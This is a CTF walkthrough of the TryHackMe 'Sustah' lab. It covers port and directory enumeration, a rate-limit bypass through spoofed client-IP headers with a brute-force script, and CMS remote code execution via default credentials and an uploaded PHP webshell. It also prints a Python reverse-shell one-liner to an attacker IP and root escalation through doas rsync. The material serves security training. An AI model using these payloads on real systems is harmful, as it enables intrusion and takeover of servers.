Sustah -TryHackMe

Play a game to gain access to a vulnerable CMS. Can you beat the odds? The developers have added anti-cheat measures to their game. Are you able to defeat the restrictions to gain access to their internal CMS?

Where to find this room?

https://tryhackme.com/room/sustah

Enumeration

NMAP

# Identify the open ports on the target (SYN scan, all 65535 ports, skip host discovery)
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.59.72

# Service/version detection, default scripts and OS fingerprinting on the open ports found above
⇒ sudo nmap -O -A -Pn -T4 -p22,80,8085 10.10.59.72

Directory Busting

⇒ ffuf -u http://10.10.112.173:8085/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c

Ports 80 and 8085 are both hosting some kind of website. Exploring the web page on port 80 does not reveal anything, while the page on port 8085 shows a spinning wheel and an input field asking us to guess a number.

Put some arbitrary number in this input box and observe the request response in Burp Suite:

In the response we can see some headers (highlighted above) which indicate that rate-limit checks are applied by the server. To confirm this, I tried brute forcing the input field with Burp Suite Intruder and quickly hit the server-side rate limit. So the way forward is to bypass the rate limit. After searching around I found the following Burp Suite extension and experimented with all the headers it adds to a request in order to spoof the client address the server rate-limits on:

https://github.com/TheKingOfDuck/burpFakeIP/blob/master/fakeIP.py

Many headers can be added to a request, each carrying a different or random IP address, to trick a server (or a proxy in front of it) into keying its rate limit on the spoofed address instead of the real one. These are:

X-Forwarded-For
X-Forwarded
Forwarded-For
Forwarded
X-Forwarded-Host
X-remote-IP
X-remote-addr
True-Client-IP
X-Client-IP
Client-IP
X-Real-IP
Ali-CDN-Real-IP
Cdn-Src-Ip
Cdn-Real-Ip
CF-Connecting-IP
X-Cluster-Client-IP
WL-Proxy-Client-IP
Proxy-Client-IP
Fastly-Client-Ip
True-Client-Ip
X-Originating-IP
X-Host
X-Custom-IP-Authorization

In our case the header "X-remote-addr: 127.0.0.1" proved useful: the application trusts it as the client address and exempts loopback, so adding it to the request makes the rate-limit headers in the server's response disappear. Which header works is application-specific; the others in the list above are worth trying against other targets.

The chance of winning shown on the wheel is 0.004%, i.e. 1 in 25,000, so the winning number lies in a 25,000-value space. We can brute force this with a simple Python script that uses the requests module to POST guesses to the server (with the bypass header set on every request). For this run I took the range 10,000 to 25,000; a smarter strategy is to break the range into small chunks and run the script per chunk, so a run that does get rate-limited can be resumed where it stopped:
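The brute-force logic described above, written out as an added example (this is not the original write-up's script). It uses only the standard library, sends the "X-remote-addr: 127.0.0.1" bypass header with every guess, walks the range in resumable chunks and aborts as soon as the server signals a rate limit rather than silently burning guesses. Assumptions are labelled: the page does not show the form field name, so the field is assumed to be called "number", and the win condition is assumed to be a marker string that only the winning response contains. A constructed stand-in for the port-8085 app is included so the logic can be exercised offline.

```python
"""Rate-limit-bypass brute force for the number-guessing form (added example).

Assumptions (not shown on the page):
  - the form posts one field, assumed to be named "number"
  - the app trusts X-remote-addr and exempts 127.0.0.1 from rate limiting
  - a winning guess is recognised by a marker string absent from losing responses
"""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterator, Optional, Tuple

# A sender returns (HTTP status, response body, response headers).
Response = Tuple[int, str, Dict[str, str]]
Sender = Callable[[int, Dict[str, str]], Response]

RATE_LIMIT_HEADER_NAMES = ("x-ratelimit-limit", "x-ratelimit-remaining", "retry-after")


class RateLimited(Exception):
    """Raised when the server signals that the limit has been hit."""


def rate_limit_headers(resp_headers: Dict[str, str]) -> Dict[str, str]:
    """Return the rate-limit headers present in a response (the tell we saw in Burp)."""
    return {k: v for k, v in resp_headers.items() if k.lower() in RATE_LIMIT_HEADER_NAMES}


def chunked_ranges(start: int, end: int, size: int) -> Iterator[range]:
    """Split [start, end) into ranges of at most `size` guesses so a run can be resumed."""
    for lo in range(start, end, size):
        yield range(lo, min(lo + size, end))


def brute_force_number(send: Sender, start: int, end: int, win_marker: str,
                       bypass_header: Optional[Tuple[str, str]] = ("X-remote-addr", "127.0.0.1"),
                       chunk_size: int = 1000) -> Optional[int]:
    """Try every number in [start, end); return the winning guess, or None if none wins.

    A 429, or a rate-limit header reporting zero remaining requests, aborts the run.
    """
    headers = dict([bypass_header]) if bypass_header else {}
    for rng in chunked_ranges(start, end, chunk_size):
        for guess in rng:
            status, body, resp_headers = send(guess, headers)
            limits = {k.lower(): v for k, v in rate_limit_headers(resp_headers).items()}
            if status == 429 or limits.get("x-ratelimit-remaining") == "0":
                raise RateLimited(f"rate limited at guess {guess}; resume from here")
            if win_marker in body:
                return guess
    return None


def http_sender(url: str, field: str = "number", timeout: float = 10.0) -> Sender:
    """Build a Sender that POSTs the guess as form data to `url` (stdlib urllib only)."""
    def send(guess: int, headers: Dict[str, str]) -> Response:
        data = urllib.parse.urlencode({field: guess}).encode()
        req = urllib.request.Request(url, data=data, headers=headers, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read().decode(errors="replace"), dict(resp.headers)
        except urllib.error.HTTPError as err:  # 429 etc. arrive here, not as a return value
            return err.code, err.read().decode(errors="replace"), dict(err.headers)
    return send


class SimulatedWheel:
    """Constructed stand-in for the port-8085 app, for exercising the logic offline.

    Each client gets `limit` guesses; the client key is taken from X-remote-addr when
    present, and loopback is exempt (the trust flaw the bypass relies on).
    """
    def __init__(self, secret: int, limit: int = 100) -> None:
        self.secret, self.limit, self.counts = secret, limit, {}

    def send(self, guess: int, headers: Dict[str, str]) -> Response:
        client = headers.get("X-remote-addr", "10.8.0.1")  # "real" address if no override
        hdrs: Dict[str, str] = {}
        if client != "127.0.0.1":
            self.counts[client] = self.counts.get(client, 0) + 1
            remaining = max(self.limit - self.counts[client], 0)
            hdrs = {"X-RateLimit-Limit": str(self.limit), "X-RateLimit-Remaining": str(remaining)}
            if self.counts[client] > self.limit:
                return 429, "Too many requests", {**hdrs, "Retry-After": "60"}
        body = "Congratulations! Here is your path" if guess == self.secret else "Try again"
        return 200, body, hdrs


if __name__ == "__main__":
    # Against the real target, swap in http_sender("http://TARGET:8085/", field="number").
    print(brute_force_number(SimulatedWheel(12345, limit=50).send, 10000, 25000, "Congratulations"))
```

Against the live box, replace the simulated sender with `http_sender("http://10.10.112.173:8085/")` (adjusting the field name once you have seen the real request in Burp) and use the text of the winning page as the marker.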

This indeed gives us our number, and submitting it reveals a path:

This directory exists on the default HTTP port, port 80, and browsing it reveals the CMS that one of the room's questions asks about. Let's use ffuf to find any other directories and files under this path, this time with common extensions appended to each wordlist entry:

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://10.10.91.116/Y***********h/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .php,.html,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0
________________________________________________
:: Method : GET
:: URL : http://10.10.91.116/Y***********h/FUZZ
:: Wordlist : FUZZ:/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
about.php [Status: 200, Size: 8727, Words: 980, Lines: 130]
contact.php [Status: 200, Size: 7686, Words: 762, Lines: 117]
blog [Status: 301, Size: 325, Words: 20, Lines: 10]
img [Status: 301, Size: 324, Words: 20, Lines: 10]
sitemap.php [Status: 200, Size: 1446, Words: 119, Lines: 27]
css [Status: 301, Size: 324, Words: 20, Lines: 10]
template [Status: 301, Size: 329, Words: 20, Lines: 10]
index.php [Status: 200, Size: 14021, Words: 1505, Lines: 207]
log [Status: 301, Size: 324, Words: 20, Lines: 10]
theme [Status: 301, Size: 326, Words: 20, Lines: 10]
changes.txt [Status: 200, Size: 627, Words: 103, Lines: 11]
plugin [Status: 301, Size: 327, Words: 20, Lines: 10]
undo [Status: 301, Size: 325, Words: 20, Lines: 10]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 14017, Words: 1505, Lines: 207]
:: Progress: [882184/882184] :: Job [1/1] :: 1558 req/sec :: Duration: [0:09:26] :: Errors: 0 ::

Browsing to the changes.txt file found above gives us the version number of the CMS, which is also asked in the questions:

We now have a CMS and its version number. Using searchsploit we can see that this version is vulnerable to an authenticated Remote Code Execution, and the exploit is available here:

https://www.exploit-db.com/exploits/48780

Reverse Shell

The exploit is simple. From the link above, the steps are:

1. Log in to the CMS. The default credentials are:
Username: admin
Password: changeme

2. Navigate to the file upload functionality (http://target/codebase/dir.php?type=filenew) and upload a file called 'webshell.php' with the content '<?php system($_GET["cmd"]); ?>'.

3. Execute remote commands by browsing to:
http://target/webshell.php?cmd=whoami

Reaching the upload page is a bit tricky. Follow this:

  • Go to sitemap.php.
  • Then go to TestPage, which takes you to http://10.10.85.125/Y***********h/lorem.php. Click the "Log in with" link on this page.
  • You will reach http://10.10.85.125/Y***********h/lorem.php?login=admin. Use admin/changeme as the credentials and dismiss the password change prompt by clicking "Cancel".
  • Go to File->New; here we are able to upload our webshell.php, which contains the following PHP code:

<?php system($_GET["cmd"]); ?>

  • Access the web shell as follows to confirm we have RCE (the upload lands in the img/ directory):

http://10.10.85.125/Y***********th/img/webshell.php?cmd=whoami

We can see from the above that we indeed have RCE on the server. Let's get a reverse shell by sending the following Python one-liner in the cmd parameter instead of "whoami" (it must be URL-encoded when placed in the query string, as the quotes, spaces and semicolons would otherwise be mangled):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.98.192",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Start a netcat listener on port 9999 on the attacker machine before sending the above payload:

nc -nlvp 9999

We got our Reverse Shell:

Upgrade Shell

We have a basic shell with limited functionality (no job control, no tab completion, Ctrl+C kills the connection). Let's upgrade it to a more stable shell by running the following commands:

/usr/bin/script -qc /bin/bash /dev/null
(press Ctrl+Z to background the shell)
stty raw -echo
fg
export TERM=xterm

Privilege Escalation

User Flag

We can see a user named "kiran" under /home, and a file named "user.txt" under /home/kiran that is readable only by kiran. So we first need a horizontal privilege escalation to the user kiran. I tried a few privilege escalation scripts but nothing obvious popped up, so following the hint in the room I looked for backups using the locate command and found a backup password file which did contain the password for user "kiran":

Using the password found I switched user to kiran and got the user flag:

Root Flag

I transferred linpeas.sh to the target and ran it. The following doas.conf configuration is highlighted as the most probable privilege escalation vector:

From https://man.openbsd.org/doas.conf.5, the doas utility executes commands as other users according to the rules in the doas.conf configuration file. The doas.conf above permits user kiran to run rsync as root without a password (a rule of the form "permit nopass kiran as root cmd rsync"). rsync's -e option sets the program used as the remote shell, and because rsync is now running as root, whatever that program is also runs as root. From GTFOBins I took the following command and ran it to get root:

doas rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null

That's it. I liked this room very much as it is more on the practical side of things: we had to do a rate-limit bypass, which was a lot of fun. Hope you have also enjoyed this write-up.

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs: Security+, PenTest+, AZ900